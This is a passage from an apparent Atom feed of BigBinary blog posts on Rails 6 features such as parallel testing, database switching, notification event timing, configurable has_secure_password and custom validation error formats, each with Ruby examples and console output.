 create_table :users, if_not_exists: false do |t|&gt;&gt;       t.string :name, index: { unique: true }&gt;&gt;&gt;&gt;       t.timestamps&gt;&gt;     end&gt;&gt;   end&gt;&gt; end&gt;&gt; CreateUsers.new.change-- create_table(:users, {:if_not_exists=&gt;false})CREATE TABLE &quot;users&quot; (&quot;id&quot; bigserial primary key, &quot;name&quot; character varying, &quot;created_at&quot; timestamp(6) NOT NULL, &quot;updated_at&quot; timestamp(6) NOT NULL)=&gt; Traceback (most recent call last):        2: from (irb):23        1: from (irb):15:in `change'ActiveRecord::StatementInvalid (PG::DuplicateTable: ERROR:  relation &quot;users&quot; already exists)</code></pre><p>As we can see, Rails raised an exception here because<a href="https://github.com/rails/rails/pull/31382">if_not_exists</a> was set to false.</p><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31382">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 has added a way to change the database of the app]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-has-added-a-way-to-change-the-database-of-the-app"/>
      <updated>2019-04-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-has-added-a-way-to-change-the-database-of-the-app</id>
      <content type="html"><![CDATA[<p>Rails allows us to use different databases using the <code>database.yml</code> config file.It uses sqlite3 as the default database when a new Rails app is created. But itis also possible to use different databases such as MySQL or PostgreSQL. Thecontents of <code>database.yml</code> change as per the database. Also each database has adifferent adapter. We need to include the gems <code>pg</code> or <code>mysql2</code> accordingly.</p><p>Before Rails 6, it was not possible to change the contents of <code>database.yml</code>automatically. But now a<a href="https://github.com/rails/rails/pull/34832">command has been added</a> to do thisautomatically.</p><p>Let's say our app has started with sqlite and now we have to switch to MySQL.</p><pre><code class="language-bash">$ rails db:system:change --to=mysql    conflict  config/database.ymlOverwrite /Users/prathamesh/Projects/reproductions/squish_app/config/database.yml? (enter &quot;h&quot; for help) [Ynaqdhm] Y       force  config/database.yml        gsub  Gemfile        gsub  Gemfile</code></pre><p>Our <code>database.yml</code> is now changed to contain the configuration for MySQLdatabase and the <code>Gemfile</code> also gets updated automatically with addition of<code>mysql2</code> gem in place of <code>sqlite3</code>.</p><p>This command also takes care of using<a href="https://github.com/rails/rails/pull/35522">proper gem versions</a> in the Gemfilewhen the database backend is changed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds parallel testing]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-parallel-testing"/>
      <updated>2019-04-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-parallel-testing</id>
      <content type="html"><![CDATA[<p>We frequently think about how good it would be if we could run tests in parallelon local so there would be less wait time for tests to be completed. Wait timesincrease considerably when the count of tests are on the higher side, which is acommon case for a lot of applications.</p><p>Though CI tools like <a href="https://circleci.com/">CircleCi</a> and<a href="https://travis-ci.org/">Travis CI</a> provide a feature to run tests in parallel,there still wasn't a straightforward way to parallelize tests on local beforeRails 6.</p><p>Before Rails 6, if we wanted to parallelize tests, we would use<a href="https://github.com/grosser/parallel_tests">Parallel Tests</a>.</p><p>Rails 6 adds the parallelization of tests by default. Rails 6 added<a href="https://github.com/rails/rails/pull/31900">parallelize</a> as a class method on<a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/TestCase.html">ActiveSupport::TestCase</a>which takes a hash as a parameter with the keys <code>workers</code> and <code>with</code>. The<code>worker</code> key is responsible for setting the number of parallel workers. Thedefault value of the <code>worker</code> key is <code>:number_of_processors</code>, which finds thenumber of processors on the machine and sets it as the number of parallelworkers. <code>with</code> takes two values - <code>:processes</code>, which is the default one, and<code>:threads</code> as a value.</p><p>Rails 6 also added two hooks - <code>parallelize_setup</code>, which is called before theprocesses are forked, and <code>parallelize_teardown</code>, which is called after theprocesses are killed. Rails 6 also handles creation of multiple databases andnamespacing of those databases for parallel tests out of the box.</p><p>If we want to disable parallel testing, we can set the value of <code>workers</code> as 1or less.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">class ActiveSupport::TestCase  parallelize_setup do |worker|    # setup databases  end   parallelize_teardown do |worker|    # cleanup database  end  # Run tests in parallel with specified workers  parallelize(workers: :number_of_processors)  # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.  fixtures :all  # Add more helper methods to be used by all tests here...end</code></pre><p>Rails 6 also provides an environment variable <code>PARALLEL_WORKERS</code> to set thenumber of parallel workers on runtime.</p><pre><code class="language-bash">$ PARALLEL_WORKERS=10 bin/rails test</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31900">pull request</a>for adding <code>parallelize</code> and<a href="https://github.com/rails/rails/pull/34735">pull request</a> for setting number ofprocessors as default workers count.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 improves ActiveSupport::Notifications::Event]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-cpu-time-idle-time-and-allocations-to-activesupport-notifications-event"/>
      <updated>2019-04-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-cpu-time-idle-time-and-allocations-to-activesupport-notifications-event</id>
      <content type="html"><![CDATA[<p>Rails provides an easy way to instrument events and ability to subscribe tothose events using<a href="https://guides.rubyonrails.org/active_support_instrumentation.html">Active Support Instrumentation</a>API.</p><h2>Before Rails 6</h2><p>Before Rails 6, the subscriber of an event can access the event's start time,end time and the duration along with the other event information.</p><p>To demonstrate how to access this information from an event, we will instrumenta custom event <code>custom_sleep_event</code> and attach a subscriber to that event.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('custom_sleep_event') do |*args|  event = ActiveSupport::Notifications::Event.new(*args)  puts &quot;Event: #{event.inspect}&quot;  puts &quot;Started: #{event.time}&quot;  puts &quot;Finished: #{event.end}&quot;  puts &quot;Duration (ms): #{event.duration}&quot;endActiveSupport::Notifications.instrument('custom_sleep_event') do  sleep 2end</code></pre><p>The event subscriber should print something similar.</p><pre><code class="language-plaintext">Event: #&lt;ActiveSupport::Notifications::Event:0x00007f952fc6a0b8 @name=&quot;custom_sleep_event&quot;, @payload={}, @time=2019-04-11 16:58:52 +0530, @transaction_id=&quot;e82231ab65b7af3c85ec&quot;, @end=2019-04-11 16:58:54 +0530, @children=[], @duration=nil&gt;Started: 2019-04-11 16:58:52 +0530Finished: 2019-04-11 16:58:54 +0530Duration (ms): 2001.287</code></pre><h2>Improvements and additions made to ActiveSupport::Notifications::Event in Rails 6</h2><p>Rails 6 has improved the way an event's duration is computed and also addeduseful information accessible on an event object such as CPU time, idle time andallocations.</p><p>Let's discuss it in more detail.</p><h5>1. <code>CLOCK_MONOTONIC</code> instead of <code>CLOCK_REALTIME</code></h5><p>Before Rails 6, <code>Time.now</code> is used for recording the event's start time and endtime. To avoid<a href="https://github.com/rails/rails/issues/34271">issues with the machine changing time</a>,Rails 6 now uses<a href="https://www.rubydoc.info/gems/concurrent-ruby/Concurrent.monotonic_time"><code>Concurrent.monotonic_time</code></a>instead of <code>Time.now</code> to record the event's both start time and end timeaccurately.</p><p>Initially<a href="https://ruby-doc.org/core-2.5.3/Process.html#method-c-clock_gettime"><code>Process.clock_gettime(Process::CLOCK_MONOTONIC)</code></a>was used which<a href="https://github.com/rails/rails/commit/dda9452314bb904a3e2c850bd23f118eb80e3356#diff-b82336d1f77b84d28210f9b46fcff97d">later modified</a>to use <code>Concurrent.monotonic_time</code>. Note that <code>Concurrent.monotonic_time</code> issame but returns more precise time than<code>Process.clock_gettime(Process::CLOCK_MONOTONIC)</code>.</p><blockquote><p><code>Time.now</code> or <code>Process.clock_gettime(Process::CLOCK_REALTIME)</code> can jumpforwards and backwards as the system time-of-day clock is changed. Whereas,clock time using <code>CLOCK_MONOTONIC</code> returns the absolute wall-clock time sincean unspecified time in the past (for example, system start-up time, or theEpoch). The <code>CLOCK_MONOTONIC</code> does not change with the system time-of-dayclock, it just keeps advances forwards at one tick per tick and resets if thesystem is rebooted. In general, <code>CLOCK_MONOTONIC</code> is recommended to computethe elapsed time between two events. To read more about the differencesbetween <code>CLOCK_REALTIME</code> and <code>CLOCK_MONOTONIC</code>, please check the discussion on[this Stackoverflow thread](https://stackoverflow.com/questions/3523442/&gt;difference-between-clock-realtime-and-clock-monotonic). Another<a href="https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/">article</a>written by Luca Guidi on the same topic is a recommended read.</p></blockquote><h5>2. No need to create hand made event objects on our own</h5><p>Since it is a common practice to initialize an event using<code>ActiveSupport::Notifications::Event.new(*args)</code> in the event subscriber block,<a href="https://github.com/rails/rails/pull/33451">Rails 6 now makes this a bit easy</a>.If the block passed to the subscriber only takes one argument then the ActiveSupport Notification framework now yields an event object to the block.</p><p>Therefore, the subscriber definition below</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('an_event') do |*args|  event = ActiveSupport::Notifications::Event.new(*args)  puts &quot;Event #{event.name} received.&quot;end</code></pre><p>now can be simplified in Rails 6 as follows.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('an_event') do |event|  puts &quot;Event #{event.name} received.&quot;end</code></pre><h5>3. CPU time and idle time</h5><p>Rails 6 now computes elapsed CPU time of an event with the help of<a href="https://ruby-doc.org/core-2.5.3/Process.html#method-c-clock_gettime"><code>Process.clock_gettime(Process::CLOCK_PROCESS_CPUTIME_ID)</code></a>.</p><p>System (kernel) keeps track of CPU time per process. The clock time returnedusing <code>CLOCK_PROCESS_CPUTIME_ID</code> represents the CPU time that has passed sincethe process started. Since a process may not always get all CPU cycles betweenstart and finish of the process, the process often has to (sleep and) share CPUtime among other processes. If the system puts a process to sleep, then the timespend waiting is not counted in the process' CPU time.</p><p>The CPU time of an event can be fetched using the <code>#cpu_time</code> method.</p><p>Also, Rails 6 now computes the idle time of an event, too. The idle time of anevent represents the difference between the event's <code>#duration</code> and <code>#cpu_time</code>.Note that the <code>#duration</code> is computed using the difference between the event'smonotonic time at the start (<code>#time</code>) and the monotonic time at the end(<code>#end</code>).</p><p>Let's see how to get these time values.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('custom_sleep_event') do |event|  puts &quot;Event: #{event.inspect}&quot;  puts &quot;Started: #{event.time}&quot;  puts &quot;Finished: #{event.end}&quot;  puts &quot;Duration (ms): #{event.duration}&quot;  puts &quot;CPU time (ms): #{event.cpu_time}&quot;  puts &quot;Idle time (ms): #{event.idle_time}&quot;endActiveSupport::Notifications.instrument('custom_sleep_event') do  sleep 2end</code></pre><p>It prints this.</p><pre><code class="language-plaintext">Event: #&lt;ActiveSupport::Notifications::Event:0x00007fb02ac72400 @name=&quot;custom_sleep_event&quot;, @payload={}, @time=29514.525707, @transaction_id=&quot;43ca8e1c378b6b00d861&quot;, @end=29516.528971, @children=[], @duration=nil, @cpu_time_start=2.238801, @cpu_time_finish=2.238874, @allocation_count_start=835821, @allocation_count_finish=835821&gt;Started: 29514.525707Finished: 29516.528971Duration (ms): 2003.2639999990351CPU time (ms): 0.07299999999998974Idle time (ms): 2003.190999999035</code></pre><p>Notice the <code>@cpu_time_start</code> and <code>@cpu_time_finish</code> counters in the inspectedevent object representation which are used to calculate the CPU time.</p><h5>4. Allocations</h5><p>We will now know how many objects were allocated between the start and end of anevent using event's <code>#allocations</code> method.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('custom_sleep_event') do |event|  puts &quot;Event: #{event.inspect}&quot;  puts &quot;Started: #{event.time}&quot;  puts &quot;Finished: #{event.end}&quot;  puts &quot;Duration (ms): #{event.duration}&quot;  puts &quot;CPU time (ms): #{event.cpu_time}&quot;  puts &quot;Idle time (ms): #{event.idle_time}&quot;  puts &quot;# of objects allocated: #{event.allocations}&quot;endActiveSupport::Notifications.instrument('custom_sleep_event') do  sleep 2end</code></pre><p>The above example should print something like this.</p><pre><code class="language-plaintext">Event: #&lt;ActiveSupport::Notifications::Event:0x00007fed8c4e33c0 @name=&quot;custom_sleep_event&quot;, @payload={}, @time=30503.508897, @transaction_id=&quot;5330165dae2b49fbe143&quot;, @end=30505.513547, @children=[], @duration=nil, @cpu_time_start=2.813231, @cpu_time_finish=2.813404, @allocation_count_start=834227, @allocation_count_finish=834228&gt;Started: 30503.508897Finished: 30505.513547Duration (ms): 2004.6499999989464CPU time (ms): 0.17299999999975668Idle time (ms): 2004.4769999989467# of objects allocated: 1</code></pre><p>Notice the <code>@allocation_count_finish</code> and <code>@allocation_count_start</code> counters inthe inspected event object representation which are used to calculate the numberof objects allocated during an event whose difference is (834228 - 834227 = 1).</p><blockquote><p>In case of JRuby, the<a href="https://github.com/rails/rails/blob/3e628c48406440811f9201e2db7ba0df53bb38e1/activesupport/lib/active_support/notifications/instrumenter.rb#L155-L157">allocations would be zero</a>.</p></blockquote><h5>5. <code>#start!</code> and <code>#finish!</code></h5><p>Two public methods <code>#start!</code> and <code>#finish!</code> have been introduced to<code>ActiveSupport::Notifications::Event</code> which can be used to record moreinformation.</p><p>The <code>#start!</code> method<a href="https://github.com/rails/rails/blob/45511fa8b20c621e2cf193ddaeb7d6fbe8432fea/activesupport/lib/active_support/notifications/instrumenter.rb#L79-L83">resets</a>the <code>@time</code>, <code>@cpu_time_start</code> and <code>@allocation_count_start</code> counters.Similarly, the <code>#finish!</code> method also<a href="https://github.com/rails/rails/blob/45511fa8b20c621e2cf193ddaeb7d6fbe8432fea/activesupport/lib/active_support/notifications/instrumenter.rb#L86-L90">resets</a>the <code>@end</code>, <code>@cpu_time_finish</code> and <code>@allocation_count_finish</code> counters.</p><hr><p>To learn more about this feature, please check<a href="https://github.com/rails/rails/pull/33449">rails/rails#33449</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 allows configurable attribute on #has_secure_password]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-configurable-attribute-name-on-has_secure_password"/>
      <updated>2019-04-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-configurable-attribute-name-on-has_secure_password</id>
      <content type="html"><![CDATA[<p><a href="https://api.rubyonrails.org/v5.2/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password">has_secure_password</a>is used to encrypt and authenticate passwords using<a href="https://github.com/codahale/bcrypt-ruby">BCrypt</a> . It assumes the model has acolumn named <code>password_digest</code>.</p><p>Before Rails 6,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password">has_secure_password</a>did not accept any attribute as a parameter. So, if we needed<a href="https://github.com/codahale/bcrypt-ruby">BCrypt</a> encryption on a differentcolumn other than <code>password_digest</code>, we would have to manually encrypt the valuebefore storing it.</p><p>Rails 6 makes it easy and allows custom attributes as a parameter to<code>has_secure_password</code>. <code>has_secure_password</code> still defaults to <code>password</code> so itworks with previous versions of Rails. <code>has_secure_password</code> still needs thecolumn named <code>column_name_digest</code> defined on the model.</p><p><code>has_secure_password</code> also adds the <code>authenticate_column_name</code> method toauthenticate the custom column.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   has_secure_password&gt;&gt; end=&gt; [ActiveModel::Validations::ConfirmationValidator]&gt;&gt; user = User.create(email: 'amit.choudhary@bigbinary.com', password: 'amit.choudhary')BEGINUser Create (0.8ms)  INSERT INTO &quot;users&quot; (&quot;email&quot;, &quot;password_digest&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3, $4) RETURNING &quot;id&quot;  [[&quot;email&quot;, &quot;amit.choudhary@bigbinary.com&quot;], [&quot;password_digest&quot;, &quot;$2a$10$g6ZJNgakn4I1w/qjAx3vM.I76QSNjFCHtTtT9ovko/9Th50SEmIBO&quot;], [&quot;created_at&quot;, &quot;2019-03-17 23:30:13.754379&quot;], [&quot;updated_at&quot;, &quot;2019-03-17 23:30:13.754379&quot;]]COMMIT=&gt; #&lt;User id: 1, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: &quot;$2a$10$g6ZJNgakn4I1w/qjAx3vM.I76QSNjFCHtTtT9ovko/9...&quot;, created_at: &quot;2019-03-17 23:30:13&quot;, updated_at: &quot;2019-03-17 23:30:13&quot;&gt;&gt;&gt; user.authenticate('amit.choudhary')=&gt; #&lt;User id: 1, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: &quot;$2a$10$g6ZJNgakn4I1w/qjAx3vM.I76QSNjFCHtTtT9ovko/9...&quot;, created_at: &quot;2019-03-17 23:30:13&quot;, updated_at: &quot;2019-03-17 23:30:13&quot;&gt;&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   has_secure_password :transaction_password&gt;&gt; end=&gt; NoMethodError: undefined method 'fetch' for :transaction_password:Symbolfrom (irb):9:in '&lt;class:User&gt;'from (irb):8</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   has_secure_password&gt;&gt;   has_secure_password :transaction_password&gt;&gt; end=&gt; [ActiveModel::Validations::ConfirmationValidator]&gt;&gt; user = User.create(email: 'amit.choudhary@bigbinary.com', password: 'amit.choudhary', transaction_password: 'amit.choudhary')BEGINUser Create (0.5ms)  INSERT INTO &quot;users&quot; (&quot;email&quot;, &quot;password_digest&quot;, &quot;transaction_password_digest&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3, $4, $5) RETURNING &quot;id&quot;  [[&quot;email&quot;, &quot;amit.choudhary@bigbinary.com&quot;], [&quot;password_digest&quot;, &quot;$2a$10$nUiO7E2XrIJx/sSdpG0JAOL00uFvPRH7kXHLk5f/6qA1zLPHIrpPy&quot;], [&quot;transaction_password_digest&quot;, &quot;$2a$10$l6cTpHwV9xOEn2.OumI29OnualGpvr1CgrNrbuMuHyGTltko8eBG2&quot;], [&quot;created_at&quot;, &quot;2019-03-17 23:42:28.723431&quot;], [&quot;updated_at&quot;, &quot;2019-03-17 23:42:28.723431&quot;]]COMMIT=&gt; #&lt;User id: 5, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: [FILTERED], transaction_password_digest: [FILTERED], created_at: &quot;2019-03-17 23:42:28&quot;, updated_at: &quot;2019-03-17 23:42:28&quot;&gt;&gt;&gt; user.authenticate('amit.choudhary')=&gt; #&lt;User id: 5, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: [FILTERED], transaction_password_digest: [FILTERED], created_at: &quot;2019-03-17 23:42:28&quot;, updated_at: &quot;2019-03-17 23:42:28&quot;&gt;&gt;&gt; user.authenticate_transaction_password('amit.choudhary')=&gt; #&lt;User id: 5, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: [FILTERED], transaction_password_digest: [FILTERED], created_at: &quot;2019-03-17 23:42:28&quot;, updated_at: &quot;2019-03-17 23:42:28&quot;&gt;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/26764">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 allows overriding ActiveModel::Errors#full_message]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-to-override-the-activemodel-errors-full_message-format-at-the-model-level-and-at-the-attribute-level"/>
      <updated>2019-04-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-to-override-the-activemodel-errors-full_message-format-at-the-model-level-and-at-the-attribute-level</id>
      <content type="html"><![CDATA[<h2>Before Rails 6</h2><p>Before Rails 6, the default format <code>%{attribute} %{message}</code> is used to displayvalidation error message for a model's attribute.</p><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:title, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;Title cannot be blank&quot;&gt; &gt;</code></pre><p>The default format can be overridden globally using a language-specific localefile.</p><pre><code class="language-yaml"># config/locales/en.ymlen:errors:format:&quot;'%{attribute}' %{message}&quot;</code></pre><p>With this change, the full error message is changed for all the attributes ofall models.</p><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:title, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;'Title' cannot be blank&quot;&gt; &gt; user = User.new&gt; &gt; =&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;'First name' cannot be blank&quot;&gt; &gt;</code></pre><p>This trick works in some cases but it doesn't work if we have to customize theerror messages on the basis of specific models or attributes.</p><p>Before Rails 6, there is no easy way to generate error messages like shownbelow.</p><pre><code class="language-plaintext">The article's title cannot be empty</code></pre><p>or</p><pre><code class="language-plaintext">First name of a person cannot be blank</code></pre><p>If we change the <code>errors.format</code> to <code>The article's %{attribute} %{message}</code> in<code>config/locales/en.yml</code> then that format will be unexpectedly used for othermodels, too.</p><pre><code class="language-yaml"># config/locales/en.ymlen:errors:format:&quot;The article's %{attribute} %{message}&quot;</code></pre><p>This is what will happen if we make such a change.</p><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:title, &quot;cannot be empty&quot;)&gt; &gt; =&gt; &quot;The article's Title cannot be empty&quot;&gt; &gt; user = User.new&gt; &gt; =&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;The article's First name cannot be blank&quot;&gt; &gt;</code></pre><p>Notice the error message generated for the <code>:first_name</code> attribute of Usermodel. This does not look the way we want, right?</p><p>Let's see what is changed in Rails 6 to overcome this problem.</p><h2>Enhancements made to <code>ActiveModel::Errors#full_message</code> in Rails 6</h2><p>Overriding the format of error message globally using <code>errors.format</code> is stillsupported in Rails 6.</p><p>In addition to that, Rails 6 now also supports overriding the error message'sformat at the model level and at the attribute level.</p><p>In order to enable this support, we need to explicitly set<code>config.active_model.i18n_customize_full_message</code> to <code>true</code> in the Railsconfiguration file, preferably in <code>config/application.rb</code> which is implicitlyset to <code>false</code> by default.</p><h5>Overriding model level format</h5><p>We can customize the full error message format for each model separately.</p><pre><code class="language-yaml"># config/locales/en.ymlen:activerecord:errors:models:article:format: &quot;`%{attribute}`: %{message}&quot;user:format: &quot;%{attribute} of the user %{message}&quot;</code></pre><p>The full error messages will look like this.</p><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:title, &quot;cannot be empty&quot;)&gt; &gt; =&gt; &quot;`Title`: cannot be empty&quot;&gt; &gt; article.valid?&gt; &gt; =&gt; false&gt; &gt; article.errors.full_messages&gt; &gt; =&gt; [&quot;`Title`: can't be blank&quot;]&gt; &gt; user = User.new&gt; &gt; =&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;First name of the user cannot be blank&quot;&gt; &gt; comment = Comment.new&gt; &gt; =&gt; #&lt;Comment id: nil, message: nil, author_id: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; comment.errors.full_message(:message, &quot;is required&quot;)&gt; &gt; =&gt; &quot;Message is required&quot;&gt; &gt;</code></pre><p>Notice how the default format <code>%{attribute} %{message}</code> is used for generatingthe full error messages for the <code>Comment</code> model since its format is not beingoverridden.</p><p>Since the other methods such as <code>ActiveModel::Errors#full_messages</code>,<code>ActiveModel::Errors#full_messages_for</code>, <code>ActiveModel::Errors#to_hash</code> etc. usethe <code>ActiveModel::Errors#full_message</code> method under the hood, we get the fullerror messages according to the custom format in the returned values of thesemethods respectively as expected.</p><h5>Overriding attribute level format</h5><p>Similar to customizing format at the model level, we can customize the errorformat for specific attributes of individual models.</p><pre><code class="language-yaml"># config/locales/en.ymlen:activerecord:errors:models:article:attributes:title:format: &quot;The article's title %{message}&quot;user:attributes:first_name:format: &quot;%{attribute} of a person %{message}&quot;</code></pre><p>With such a configuration, we get the customized error message for the <code>title</code>attribute of the Article model.</p><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:title, &quot;cannot be empty&quot;)&gt; &gt; =&gt; &quot;The article's title cannot be empty&quot;&gt; &gt; article.errors.full_message(:description, &quot;cannot be empty&quot;)&gt; &gt; =&gt; &quot;Description cannot be empty&quot;&gt; &gt; user = User.new&gt; &gt; =&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;First name of a person cannot be blank&quot;&gt; &gt; user.errors.full_message(:last_name, &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;Last name cannot be blank&quot;&gt; &gt;</code></pre><p>Note that the error messages for the rest of the attributes were generated usingthe default <code>%{attribute} %{message}</code> format for which we didn't add customformats in the <code>config/locales/en.yml</code> manifest.</p><h5>Overriding model level format of deeply nested models</h5><pre><code class="language-yaml"># config/locales/en.ymlen:activerecord:errors:models:article/comments/attachments:format: &quot;%{message}&quot;</code></pre><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:'comments/attachments.file_name', &quot;is required&quot;)&gt; &gt; =&gt; &quot;is required&quot;&gt; &gt; article.errors.full_message(:'comments/attachments.path', &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;cannot be blank&quot;&gt; &gt; article.errors.full_message(:'comments.message', &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;Comments message cannot be blank&quot;&gt; &gt;</code></pre><h5>Overriding attribute level format of deeply nested models</h5><pre><code class="language-yaml"># config/locales/en.ymlen:activerecord:errors:models:article/comments/attachments:attributes:file_name:format: &quot;File name of an attachment %{message}&quot;</code></pre><pre><code class="language-ruby">&gt; &gt; article = Article.new&gt; &gt; =&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; article.errors.full_message(:'comments/attachments.file_name', &quot;is required&quot;)&gt; &gt; =&gt; &quot;File name of an attachment is required&quot;&gt; &gt; article.errors.full_message(:'comments/attachments.path', &quot;cannot be blank&quot;)&gt; &gt; =&gt; &quot;Comments/attachments path cannot be blank&quot;&gt; &gt;</code></pre><h2>Precedence</h2><p>The custom formats specified in the locale file has the following precedence inthe high to low order.</p><ul><li><code>activerecord.errors.models.article/comments/attachments.attributes.file_name.format</code></li><li><code>activerecord.errors.models.article/comments/attachments.format</code></li><li><code>activerecord.errors.models.article.attributes.title.format</code></li><li><code>activerecord.errors.models.article.format</code></li><li><code>errors.format</code></li></ul><hr><p>To learn more, please checkout<a href="https://github.com/rails/rails/pull/32956">rails/rails#32956</a> and<a href="https://github.com/rails/rails/pull/35789">rails/rails#35789</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#extract_associated]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-extract_associated"/>
      <updated>2019-04-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-extract_associated</id>
      <content type="html"><![CDATA[<p>Before Rails 6, if we want to extract associated records from an<code>ActiveRecord::Relation</code>, we would use <code>preload</code> and <code>collect</code>.</p><p>For example, we want to fetch <code>subscriptions</code> of some <code>users</code>. The query wouldlook as shown below.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">User.where(blocked: false).preload(:subscriptions).collect(&amp;:subscriptions)=&gt; # returns collection of subscription records</code></pre><p><a href="https://github.com/rails/rails/pull/35784">ActiveRecord::Relation#extract_associated</a>provides a shorthand to achieve same result and is more readable than former.</p><h4>Rails 6.0.0.beta3</h4><pre><code class="language-ruby">User.where(blocked: false).extract_associated(:subscriptions)=&gt; # returns the same collection of subscription records</code></pre><p>Here's the relevant <a href="https://github.com/rails/rails/pull/35784">pull request</a>for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds implicit_order_column]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-implicit_order_column"/>
      <updated>2019-04-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-implicit_order_column</id>
